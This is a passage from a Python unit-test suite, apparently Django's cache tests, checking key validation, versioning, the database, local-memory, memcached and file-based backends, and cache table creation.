def _perform_invalid_key_test(self, key, expected_warning):
"""
All the builtin backends should warn (except memcached that should
error) on keys that would be refused by memcached. This encourages
portable caching code without making it too difficult to use production
backends with more liberal key rules. Refs #6447.
"""
# mimic custom ``make_key`` method being defined since the default will
# never show the below warnings
def func(key, *args):
return key
old_func = cache.key_func
cache.key_func = func
tests = [
('add', [key, 1]),
('get', [key]),
('set', [key, 1]),
('incr', [key]),
('decr', [key]),
('touch', [key]),
('delete', [key]),
('get_many', [[key, 'b']]),
('set_many', [{key: 1, 'b': 2}]),
('delete_many', [{key: 1, 'b': 2}]),
]
try:
for operation, args in tests:
with self.subTest(operation=operation):
with self.assertWarns(CacheKeyWarning) as cm:
getattr(cache, operation)(*args)
self.assertEqual(str(cm.warning), expected_warning)
finally:
cache.key_func = old_func
def test_invalid_key_characters(self):
# memcached doesn't allow whitespace or control characters in keys.
key = 'key with spaces and 清'
self._perform_invalid_key_test(key, KEY_ERRORS_WITH_MEMCACHED_MSG % key)
def test_invalid_key_length(self):
# memcached limits key length to 250.
key = ('a' * 250) + '清'
expected_warning = (
'Cache key will cause errors if used with memcached: '
'%r (longer than %s)' % (key, 250)
)
self._perform_invalid_key_test(key, expected_warning)
def test_cache_versioning_get_set(self):
# set, using default version = 1
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertEqual(cache.get('answer1', version=1), 42)
self.assertIsNone(cache.get('answer1', version=2))
self.assertIsNone(caches['v2'].get('answer1'))
self.assertEqual(caches['v2'].get('answer1', version=1), 42)
self.assertIsNone(caches['v2'].get('answer1', version=2))
# set, default version = 1, but manually override version = 2
cache.set('answer2', 42, version=2)
self.assertIsNone(cache.get('answer2'))
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
# v2 set, using default version = 2
caches['v2'].set('answer3', 42)
self.assertIsNone(cache.get('answer3'))
self.assertIsNone(cache.get('answer3', version=1))
self.assertEqual(cache.get('answer3', version=2), 42)
self.assertEqual(caches['v2'].get('answer3'), 42)
self.assertIsNone(caches['v2'].get('answer3', version=1))
self.assertEqual(caches['v2'].get('answer3', version=2), 42)
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set('answer4', 42, version=1)
self.assertEqual(cache.get('answer4'), 42)
self.assertEqual(cache.get('answer4', version=1), 42)
self.assertIsNone(cache.get('answer4', version=2))
self.assertIsNone(caches['v2'].get('answer4'))
self.assertEqual(caches['v2'].get('answer4', version=1), 42)
self.assertIsNone(caches['v2'].get('answer4', version=2))
def test_cache_versioning_add(self):
# add, default version = 1, but manually override version = 2
self.assertIs(cache.add('answer1', 42, version=2), True)
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
self.assertIs(cache.add('answer1', 37, version=2), False)
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
self.assertIs(cache.add('answer1', 37, version=1), True)
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
# v2 add, using default version = 2
self.assertIs(caches['v2'].add('answer2', 42), True)
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
self.assertIs(caches['v2'].add('answer2', 37), False)
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
self.assertIs(caches['v2'].add('answer2', 37, version=1), True)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 42)
# v2 add, default version = 2, but manually override version = 1
self.assertIs(caches['v2'].add('answer3', 42, version=1), True)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertIsNone(cache.get('answer3', version=2))
self.assertIs(caches['v2'].add('answer3', 37, version=1), False)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertIsNone(cache.get('answer3', version=2))
self.assertIs(caches['v2'].add('answer3', 37), True)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertEqual(cache.get('answer3', version=2), 37)
def test_cache_versioning_has_key(self):
cache.set('answer1', 42)
# has_key
self.assertIs(cache.has_key('answer1'), True)
self.assertIs(cache.has_key('answer1', version=1), True)
self.assertIs(cache.has_key('answer1', version=2), False)
self.assertIs(caches['v2'].has_key('answer1'), False)
self.assertIs(caches['v2'].has_key('answer1', version=1), True)
self.assertIs(caches['v2'].has_key('answer1', version=2), False)
def test_cache_versioning_delete(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
self.assertIs(cache.delete('answer1'), True)
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
self.assertIs(cache.delete('answer2', version=2), True)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertIsNone(cache.get('answer2', version=2))
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
self.assertIs(caches['v2'].delete('answer3'), True)
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertIsNone(cache.get('answer3', version=2))
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
self.assertIs(caches['v2'].delete('answer4', version=1), True)
self.assertIsNone(cache.get('answer4', version=1))
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_incr_decr(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
self.assertEqual(cache.incr('answer1'), 38)
self.assertEqual(cache.get('answer1', version=1), 38)
self.assertEqual(cache.get('answer1', version=2), 42)
self.assertEqual(cache.decr('answer1'), 37)
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
self.assertEqual(cache.incr('answer2', version=2), 43)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 43)
self.assertEqual(cache.decr('answer2', version=2), 42)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 42)
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
self.assertEqual(caches['v2'].incr('answer3'), 43)
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 43)
self.assertEqual(caches['v2'].decr('answer3'), 42)
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 42)
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
self.assertEqual(caches['v2'].incr('answer4', version=1), 38)
self.assertEqual(cache.get('answer4', version=1), 38)
self.assertEqual(cache.get('answer4', version=2), 42)
self.assertEqual(caches['v2'].decr('answer4', version=1), 37)
self.assertEqual(cache.get('answer4', version=1), 37)
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_get_set_many(self):
# set, using default version = 1
cache.set_many({'ford1': 37, 'arthur1': 42})
self.assertEqual(cache.get_many(['ford1', 'arthur1']), {'ford1': 37, 'arthur1': 42})
self.assertEqual(cache.get_many(['ford1', 'arthur1'], version=1), {'ford1': 37, 'arthur1': 42})
self.assertEqual(cache.get_many(['ford1', 'arthur1'], version=2), {})
self.assertEqual(caches['v2'].get_many(['ford1', 'arthur1']), {})
self.assertEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=1), {'ford1': 37, 'arthur1': 42})
self.assertEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=2), {})
# set, default version = 1, but manually override version = 2
cache.set_many({'ford2': 37, 'arthur2': 42}, version=2)
self.assertEqual(cache.get_many(['ford2', 'arthur2']), {})
self.assertEqual(cache.get_many(['ford2', 'arthur2'], version=1), {})
self.assertEqual(cache.get_many(['ford2', 'arthur2'], version=2), {'ford2': 37, 'arthur2': 42})
self.assertEqual(caches['v2'].get_many(['ford2', 'arthur2']), {'ford2': 37, 'arthur2': 42})
self.assertEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=1), {})
self.assertEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=2), {'ford2': 37, 'arthur2': 42})
# v2 set, using default version = 2
caches['v2'].set_many({'ford3': 37, 'arthur3': 42})
self.assertEqual(cache.get_many(['ford3', 'arthur3']), {})
self.assertEqual(cache.get_many(['ford3', 'arthur3'], version=1), {})
self.assertEqual(cache.get_many(['ford3', 'arthur3'], version=2), {'ford3': 37, 'arthur3': 42})
self.assertEqual(caches['v2'].get_many(['ford3', 'arthur3']), {'ford3': 37, 'arthur3': 42})
self.assertEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=1), {})
self.assertEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=2), {'ford3': 37, 'arthur3': 42})
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set_many({'ford4': 37, 'arthur4': 42}, version=1)
self.assertEqual(cache.get_many(['ford4', 'arthur4']), {'ford4': 37, 'arthur4': 42})
self.assertEqual(cache.get_many(['ford4', 'arthur4'], version=1), {'ford4': 37, 'arthur4': 42})
self.assertEqual(cache.get_many(['ford4', 'arthur4'], version=2), {})
self.assertEqual(caches['v2'].get_many(['ford4', 'arthur4']), {})
self.assertEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=1), {'ford4': 37, 'arthur4': 42})
self.assertEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=2), {})
def test_incr_version(self):
cache.set('answer', 42, version=2)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertEqual(cache.get('answer', version=2), 42)
self.assertIsNone(cache.get('answer', version=3))
self.assertEqual(cache.incr_version('answer', version=2), 3)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertIsNone(cache.get('answer', version=2))
self.assertEqual(cache.get('answer', version=3), 42)
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertIsNone(caches['v2'].get('answer2', version=3))
self.assertEqual(caches['v2'].incr_version('answer2'), 3)
self.assertIsNone(caches['v2'].get('answer2'))
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertIsNone(caches['v2'].get('answer2', version=2))
self.assertEqual(caches['v2'].get('answer2', version=3), 42)
with self.assertRaises(ValueError):
cache.incr_version('does_not_exist')
cache.set('null', None)
if self.supports_get_with_default:
self.assertEqual(cache.incr_version('null'), 2)
else:
with self.assertRaises(self.incr_decr_type_error):
cache.incr_version('null')
def test_decr_version(self):
cache.set('answer', 42, version=2)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertEqual(cache.get('answer', version=2), 42)
self.assertEqual(cache.decr_version('answer', version=2), 1)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.get('answer', version=1), 42)
self.assertIsNone(cache.get('answer', version=2))
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertEqual(caches['v2'].decr_version('answer2'), 1)
self.assertIsNone(caches['v2'].get('answer2'))
self.assertEqual(caches['v2'].get('answer2', version=1), 42)
self.assertIsNone(caches['v2'].get('answer2', version=2))
with self.assertRaises(ValueError):
cache.decr_version('does_not_exist', version=2)
cache.set('null', None, version=2)
if self.supports_get_with_default:
self.assertEqual(cache.decr_version('null', version=2), 1)
else:
with self.assertRaises(self.incr_decr_type_error):
cache.decr_version('null', version=2)
def test_custom_key_func(self):
# Two caches with different key functions aren't visible to each other
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertIsNone(caches['custom_key'].get('answer1'))
self.assertIsNone(caches['custom_key2'].get('answer1'))
caches['custom_key'].set('answer2', 42)
self.assertIsNone(cache.get('answer2'))
self.assertEqual(caches['custom_key'].get('answer2'), 42)
self.assertEqual(caches['custom_key2'].get('answer2'), 42)
def test_cache_write_unpicklable_object(self):
fetch_middleware = FetchFromCacheMiddleware(empty_response)
fetch_middleware.cache = cache
request = self.factory.get('/cache/test')
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware(empty_response).process_request(request)
self.assertIsNone(get_cache_data)
content = 'Testing cookie serialization.'
def get_response(req):
response = HttpResponse(content)
response.set_cookie('foo', 'bar')
return response
update_middleware = UpdateCacheMiddleware(get_response)
update_middleware.cache = cache
response = update_middleware(request)
get_cache_data = fetch_middleware.process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode())
self.assertEqual(get_cache_data.cookies, response.cookies)
UpdateCacheMiddleware(lambda req: get_cache_data)(request)
get_cache_data = fetch_middleware.process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode())
self.assertEqual(get_cache_data.cookies, response.cookies)
def test_add_fail_on_pickleerror(self):
# Shouldn't fail silently if trying to cache an unpicklable type.
with self.assertRaises(pickle.PickleError):
cache.add('unpicklable', Unpicklable())
def test_set_fail_on_pickleerror(self):
with self.assertRaises(pickle.PickleError):
cache.set('unpicklable', Unpicklable())
def test_get_or_set(self):
self.assertIsNone(cache.get('projector'))
self.assertEqual(cache.get_or_set('projector', 42), 42)
self.assertEqual(cache.get('projector'), 42)
self.assertIsNone(cache.get_or_set('null', None))
if self.supports_get_with_default:
# Previous get_or_set() stores None in the cache.
self.assertIsNone(cache.get('null', 'default'))
else:
self.assertEqual(cache.get('null', 'default'), 'default')
def test_get_or_set_callable(self):
def my_callable():
return 'value'
self.assertEqual(cache.get_or_set('mykey', my_callable), 'value')
self.assertEqual(cache.get_or_set('mykey', my_callable()), 'value')
self.assertIsNone(cache.get_or_set('null', lambda: None))
if self.supports_get_with_default:
# Previous get_or_set() stores None in the cache.
self.assertIsNone(cache.get('null', 'default'))
else:
self.assertEqual(cache.get('null', 'default'), 'default')
def test_get_or_set_version(self):
msg = "get_or_set() missing 1 required positional argument: 'default'"
self.assertEqual(cache.get_or_set('brian', 1979, version=2), 1979)
with self.assertRaisesMessage(TypeError, msg):
cache.get_or_set('brian')
with self.assertRaisesMessage(TypeError, msg):
cache.get_or_set('brian', version=1)
self.assertIsNone(cache.get('brian', version=1))
self.assertEqual(cache.get_or_set('brian', 42, version=1), 42)
self.assertEqual(cache.get_or_set('brian', 1979, version=2), 1979)
self.assertIsNone(cache.get('brian', version=3))
def test_get_or_set_racing(self):
with mock.patch('%s.%s' % (settings.CACHES['default']['BACKEND'], 'add')) as cache_add:
# Simulate cache.add() failing to add a value. In that case, the
# default value should be returned.
cache_add.return_value = False
self.assertEqual(cache.get_or_set('key', 'default'), 'default')
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.db.DatabaseCache',
# Spaces are used in the table name to ensure quoting/escaping is working
LOCATION='test cache table'
))
class DBCacheTests(BaseCacheTests, TransactionTestCase):
available_apps = ['cache']
def setUp(self):
        # The super call needs to happen first for the settings override.
super().setUp()
self.create_table()
def tearDown(self):
# The super call needs to happen first because it uses the database.
super().tearDown()
self.drop_table()
def create_table(self):
management.call_command('createcachetable', verbosity=0)
def drop_table(self):
with connection.cursor() as cursor:
table_name = connection.ops.quote_name('test cache table')
cursor.execute('DROP TABLE %s' % table_name)
def test_get_many_num_queries(self):
cache.set_many({'a': 1, 'b': 2})
cache.set('expired', 'expired', 0.01)
with self.assertNumQueries(1):
self.assertEqual(cache.get_many(['a', 'b']), {'a': 1, 'b': 2})
time.sleep(0.02)
with self.assertNumQueries(2):
self.assertEqual(cache.get_many(['a', 'b', 'expired']), {'a': 1, 'b': 2})
def test_delete_many_num_queries(self):
cache.set_many({'a': 1, 'b': 2, 'c': 3})
with self.assertNumQueries(1):
cache.delete_many(['a', 'b', 'c'])
def test_zero_cull(self):
self._perform_cull_test('zero_cull', 50, 18)
def test_second_call_doesnt_crash(self):
out = io.StringIO()
management.call_command('createcachetable', stdout=out)
self.assertEqual(out.getvalue(), "Cache table 'test cache table' already exists.\n" * len(settings.CACHES))
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.db.DatabaseCache',
# Use another table name to avoid the 'table already exists' message.
LOCATION='createcachetable_dry_run_mode'
))
def test_createcachetable_dry_run_mode(self):
out = io.StringIO()
management.call_command('createcachetable', dry_run=True, stdout=out)
output = out.getvalue()
self.assertTrue(output.startswith("CREATE TABLE"))
def test_createcachetable_with_table_argument(self):
"""
Delete and recreate cache table with legacy behavior (explicitly
specifying the table name).
"""
self.drop_table()
out = io.StringIO()
management.call_command(
'createcachetable',
'test cache table',
verbosity=2,
stdout=out,
)
self.assertEqual(out.getvalue(), "Cache table 'test cache table' created.\n")
@override_settings(USE_TZ=True)
class DBCacheWithTimeZoneTests(DBCacheTests):
pass
class DBCacheRouter:
"""A router that puts the cache table on the 'other' database."""
def db_for_read(self, model, **hints):
if model._meta.app_label == 'django_cache':
return 'other'
return None
def db_for_write(self, model, **hints):
if model._meta.app_label == 'django_cache':
return 'other'
return None
def allow_migrate(self, db, app_label, **hints):
if app_label == 'django_cache':
return db == 'other'
return None
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.db.DatabaseCache',
'LOCATION': 'my_cache_table',
},
},
)
class CreateCacheTableForDBCacheTests(TestCase):
databases = {'default', 'other'}
@override_settings(DATABASE_ROUTERS=[DBCacheRouter()])
def test_createcachetable_observes_database_router(self):
# cache table should not be created on 'default'
with self.assertNumQueries(0, using='default'):
management.call_command('createcachetable', database='default', verbosity=0)
# cache table should be created on 'other'
# Queries:
# 1: check table doesn't already exist
# 2: create savepoint (if transactional DDL is supported)
# 3: create the table
# 4: create the index
# 5: release savepoint (if transactional DDL is supported)
num = 5 if connections['other'].features.can_rollback_ddl else 3
with self.assertNumQueries(num, using='other'):
management.call_command('createcachetable', database='other', verbosity=0)
class PicklingSideEffect:
def __init__(self, cache):
self.cache = cache
self.locked = False
def __getstate__(self):
self.locked = self.cache._lock.locked()
return {}
limit_locmem_entries = override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.locmem.LocMemCache',
OPTIONS={'MAX_ENTRIES': 9},
))
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.locmem.LocMemCache',
))
class LocMemCacheTests(BaseCacheTests, TestCase):
def setUp(self):
super().setUp()
# LocMem requires a hack to make the other caches
# share a data store with the 'normal' cache.
caches['prefix']._cache = cache._cache
caches['prefix']._expire_info = cache._expire_info
caches['v2']._cache = cache._cache
caches['v2']._expire_info = cache._expire_info
caches['custom_key']._cache = cache._cache
caches['custom_key']._expire_info = cache._expire_info
caches['custom_key2']._cache = cache._cache
caches['custom_key2']._expire_info = cache._expire_info
@override_settings(CACHES={
'default': {'BACKEND': 'django.core.cache.backends.locmem.LocMemCache'},
'other': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'other'
},
})
def test_multiple_caches(self):
"Multiple locmem caches are isolated"
cache.set('value', 42)
self.assertEqual(caches['default'].get('value'), 42)
self.assertIsNone(caches['other'].get('value'))
def test_locking_on_pickle(self):
"""#20613/#18541 -- Ensures pickling is done outside of the lock."""
bad_obj = PicklingSideEffect(cache)
cache.set('set', bad_obj)
self.assertFalse(bad_obj.locked, "Cache was locked during pickling")
self.assertIs(cache.add('add', bad_obj), True)
self.assertFalse(bad_obj.locked, "Cache was locked during pickling")
def test_incr_decr_timeout(self):
"""incr/decr does not modify expiry time (matches memcached behavior)"""
key = 'value'
_key = cache.make_key(key)
cache.set(key, 1, timeout=cache.default_timeout * 10)
expire = cache._expire_info[_key]
self.assertEqual(cache.incr(key), 2)
self.assertEqual(expire, cache._expire_info[_key])
self.assertEqual(cache.decr(key), 1)
self.assertEqual(expire, cache._expire_info[_key])
@limit_locmem_entries
def test_lru_get(self):
"""get() moves cache keys."""
for key in range(9):
cache.set(key, key, timeout=None)
for key in range(6):
self.assertEqual(cache.get(key), key)
cache.set(9, 9, timeout=None)
for key in range(6):
self.assertEqual(cache.get(key), key)
for key in range(6, 9):
self.assertIsNone(cache.get(key))
self.assertEqual(cache.get(9), 9)
@limit_locmem_entries
def test_lru_set(self):
"""set() moves cache keys."""
for key in range(9):
cache.set(key, key, timeout=None)
for key in range(3, 9):
cache.set(key, key, timeout=None)
cache.set(9, 9, timeout=None)
for key in range(3, 10):
self.assertEqual(cache.get(key), key)
for key in range(3):
self.assertIsNone(cache.get(key))
@limit_locmem_entries
def test_lru_incr(self):
"""incr() moves cache keys."""
for key in range(9):
cache.set(key, key, timeout=None)
for key in range(6):
self.assertEqual(cache.incr(key), key + 1)
cache.set(9, 9, timeout=None)
for key in range(6):
self.assertEqual(cache.get(key), key + 1)
for key in range(6, 9):
self.assertIsNone(cache.get(key))
self.assertEqual(cache.get(9), 9)
# memcached backend isn't guaranteed to be available.
# To check the memcached backend, the test settings file will
# need to contain at least one cache backend setting that points at
# your memcache server.
configured_caches = {}
for _cache_params in settings.CACHES.values():
configured_caches[_cache_params['BACKEND']] = _cache_params
PyLibMCCache_params = configured_caches.get('django.core.cache.backends.memcached.PyLibMCCache')
PyMemcacheCache_params = configured_caches.get('django.core.cache.backends.memcached.PyMemcacheCache')
# The memcached backends don't support cull-related options like `MAX_ENTRIES`.
memcached_excluded_caches = {'cull', 'zero_cull'}
class BaseMemcachedTests(BaseCacheTests):
# By default it's assumed that the client doesn't clean up connections
# properly, in which case the backend must do so after each request.
should_disconnect_on_close = True
def test_location_multiple_servers(self):
locations = [
['server1.tld', 'server2:11211'],
'server1.tld;server2:11211',
'server1.tld,server2:11211',
]
for location in locations:
with self.subTest(location=location):
params = {'BACKEND': self.base_params['BACKEND'], 'LOCATION': location}
with self.settings(CACHES={'default': params}):
self.assertEqual(cache._servers, ['server1.tld', 'server2:11211'])
def _perform_invalid_key_test(self, key, expected_warning):
"""
While other backends merely warn, memcached should raise for an invalid
key.
"""
msg = expected_warning.replace(key, cache.make_key(key))
tests = [
('add', [key, 1]),
('get', [key]),
('set', [key, 1]),
('incr', [key]),
('decr', [key]),
('touch', [key]),
('delete', [key]),
('get_many', [[key, 'b']]),
('set_many', [{key: 1, 'b': 2}]),
('delete_many', [{key: 1, 'b': 2}]),
]
for operation, args in tests:
with self.subTest(operation=operation):
with self.assertRaises(InvalidCacheKey) as cm:
getattr(cache, operation)(*args)
self.assertEqual(str(cm.exception), msg)
def test_default_never_expiring_timeout(self):
# Regression test for #22845
with self.settings(CACHES=caches_setting_for_tests(
base=self.base_params,
exclude=memcached_excluded_caches,
TIMEOUT=None)):
cache.set('infinite_foo', 'bar')
self.assertEqual(cache.get('infinite_foo'), 'bar')
def test_default_far_future_timeout(self):
# Regression test for #22845
with self.settings(CACHES=caches_setting_for_tests(
base=self.base_params,
exclude=memcached_excluded_caches,
# 60*60*24*365, 1 year
TIMEOUT=31536000)):
cache.set('future_foo', 'bar')
self.assertEqual(cache.get('future_foo'), 'bar')
def test_memcached_deletes_key_on_failed_set(self):
# By default memcached allows objects up to 1MB. For the cache_db session
# backend to always use the current session, memcached needs to delete
# the old key if it fails to set.
max_value_length = 2 ** 20
cache.set('small_value', 'a')
self.assertEqual(cache.get('small_value'), 'a')
large_value = 'a' * (max_value_length + 1)
try:
cache.set('small_value', large_value)
except Exception:
# Most clients (e.g. pymemcache or pylibmc) raise when the value is
# too large. This test is primarily checking that the key was
# deleted, so the return/exception behavior for the set() itself is
# not important.
pass
# small_value should be deleted, or set if configured to accept larger values
value = cache.get('small_value')
self.assertTrue(value is None or value == large_value)
def test_close(self):
# For clients that don't manage their connections properly, the
# connection is closed when the request is complete.
signals.request_finished.disconnect(close_old_connections)
try:
with mock.patch.object(cache._class, 'disconnect_all', autospec=True) as mock_disconnect:
signals.request_finished.send(self.__class__)
self.assertIs(mock_disconnect.called, self.should_disconnect_on_close)
finally:
signals.request_finished.connect(close_old_connections)
def test_set_many_returns_failing_keys(self):
def fail_set_multi(mapping, *args, **kwargs):
return mapping.keys()
with mock.patch.object(cache._class, 'set_multi', side_effect=fail_set_multi):
failing_keys = cache.set_many({'key': 'value'})
self.assertEqual(failing_keys, ['key'])
# RemovedInDjango41Warning.
MemcachedCache_params = configured_caches.get('django.core.cache.backends.memcached.MemcachedCache')
@ignore_warnings(category=RemovedInDjango41Warning)
@unittest.skipUnless(MemcachedCache_params, "MemcachedCache backend not configured")
@override_settings(CACHES=caches_setting_for_tests(
base=MemcachedCache_params,
exclude=memcached_excluded_caches,
))
class MemcachedCacheTests(BaseMemcachedTests, TestCase):
base_params = MemcachedCache_params
supports_get_with_default = False
incr_decr_type_error = ValueError
def test_memcached_uses_highest_pickle_version(self):
# Regression test for #19810
for cache_key in settings.CACHES:
with self.subTest(cache_key=cache_key):
self.assertEqual(caches[cache_key]._cache.pickleProtocol, pickle.HIGHEST_PROTOCOL)
@override_settings(CACHES=caches_setting_for_tests(
base=MemcachedCache_params,
exclude=memcached_excluded_caches,
OPTIONS={'server_max_value_length': 9999},
))
def test_memcached_options(self):
self.assertEqual(cache._cache.server_max_value_length, 9999)
def test_default_used_when_none_is_set(self):
"""
python-memcached doesn't support default in get() so this test
overrides the one in BaseCacheTests.
"""
cache.set('key_default_none', None)
self.assertEqual(cache.get('key_default_none', default='default'), 'default')
class MemcachedCacheDeprecationTests(SimpleTestCase):
def test_warning(self):
from django.core.cache.backends.memcached import MemcachedCache
# Remove warnings filter on MemcachedCache deprecation warning, added
# in runtests.py.
warnings.filterwarnings(
'error',
'MemcachedCache is deprecated',
category=RemovedInDjango41Warning,
)
try:
msg = (
'MemcachedCache is deprecated in favor of PyMemcacheCache and '
'PyLibMCCache.'
)
with self.assertRaisesMessage(RemovedInDjango41Warning, msg):
MemcachedCache('127.0.0.1:11211', {})
finally:
warnings.filterwarnings(
'ignore',
'MemcachedCache is deprecated',
category=RemovedInDjango41Warning,
)
@unittest.skipUnless(PyLibMCCache_params, "PyLibMCCache backend not configured")
@override_settings(CACHES=caches_setting_for_tests(
base=PyLibMCCache_params,
exclude=memcached_excluded_caches,
))
class PyLibMCCacheTests(BaseMemcachedTests, TestCase):
base_params = PyLibMCCache_params
# libmemcached manages its own connections.
should_disconnect_on_close = False
@property
def incr_decr_type_error(self):
return cache._lib.ClientError
@override_settings(CACHES=caches_setting_for_tests(
base=PyLibMCCache_params,
exclude=memcached_excluded_caches,
OPTIONS={
'binary': True,
'behaviors': {'tcp_nodelay': True},
},
))
def test_pylibmc_options(self):
self.assertTrue(cache._cache.binary)
self.assertEqual(cache._cache.behaviors['tcp_nodelay'], int(True))
def test_pylibmc_client_servers(self):
backend = self.base_params['BACKEND']
tests = [
('unix:/run/memcached/socket', '/run/memcached/socket'),
('/run/memcached/socket', '/run/memcached/socket'),
('localhost', 'localhost'),
('localhost:11211', 'localhost:11211'),
('[::1]', '[::1]'),
('[::1]:11211', '[::1]:11211'),
('127.0.0.1', '127.0.0.1'),
('127.0.0.1:11211', '127.0.0.1:11211'),
]
for location, expected in tests:
settings = {'default': {'BACKEND': backend, 'LOCATION': location}}
with self.subTest(location), self.settings(CACHES=settings):
self.assertEqual(cache.client_servers, [expected])
@unittest.skipUnless(PyMemcacheCache_params, 'PyMemcacheCache backend not configured')
@override_settings(CACHES=caches_setting_for_tests(
base=PyMemcacheCache_params,
exclude=memcached_excluded_caches,
))
class PyMemcacheCacheTests(BaseMemcachedTests, TestCase):
base_params = PyMemcacheCache_params
@property
def incr_decr_type_error(self):
return cache._lib.exceptions.MemcacheClientError
def test_pymemcache_highest_pickle_version(self):
self.assertEqual(
cache._cache.default_kwargs['serde']._serialize_func.keywords['pickle_version'],
pickle.HIGHEST_PROTOCOL,
)
for cache_key in settings.CACHES:
for client_key, client in caches[cache_key]._cache.clients.items():
with self.subTest(cache_key=cache_key, server=client_key):
self.assertEqual(
client.serde._serialize_func.keywords['pickle_version'],
pickle.HIGHEST_PROTOCOL,
)
@override_settings(CACHES=caches_setting_for_tests(
base=PyMemcacheCache_params,
exclude=memcached_excluded_caches,
OPTIONS={'no_delay': True},
))
def test_pymemcache_options(self):
self.assertIs(cache._cache.default_kwargs['no_delay'], True)
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.filebased.FileBasedCache',
))
class FileBasedCacheTests(BaseCacheTests, TestCase):
"""
Specific test cases for the file-based cache.
"""
def setUp(self):
super().setUp()
self.dirname = self.mkdtemp()
        # The cache LOCATION cannot be modified through override_settings /
        # modify_settings, so the settings are manipulated directly here and the
        # setting_changed signal is triggered manually.
for cache_params in settings.CACHES.values():
cache_params['LOCATION'] = self.dirname
setting_changed.send(self.__class__, setting='CACHES', enter=False)
def tearDown(self):
super().tearDown()
# Call parent first, as cache.clear() may recreate cache base directory
shutil.rmtree(self.dirname)
def mkdtemp(self):
return tempfile.mkdtemp()
def test_ignores_non_cache_files(self):
fname = os.path.join(self.dirname, 'not-a-cache-file')
with open(fname, 'w'):
os.utime(fname, None)
cache.clear()
self.assertTrue(os.path.exists(fname),
'Expected cache.clear to ignore non cache files')
os.remove(fname)
def test_clear_does_not_remove_cache_dir(self):
cache.clear()
self.assertTrue(os.path.exists(self.dirname),
'Expected cache.clear to keep the cache dir')
def test_creates_cache_dir_if_nonexistent(self):
os.rmdir(self.dirname)
cache.set('foo', 'bar')
self.assertTrue(os.path.exists(self.dirname))
def test_get_ignores_enoent(self):
cache.set('foo', 'bar')
os.unlink(cache._key_to_file('foo'))
# Returns the default instead of erroring.
self.assertEqual(cache.get('foo', 'baz'), 'baz')
@skipIf(
sys.platform == 'win32',
'Windows only partially supports umasks and chmod.',
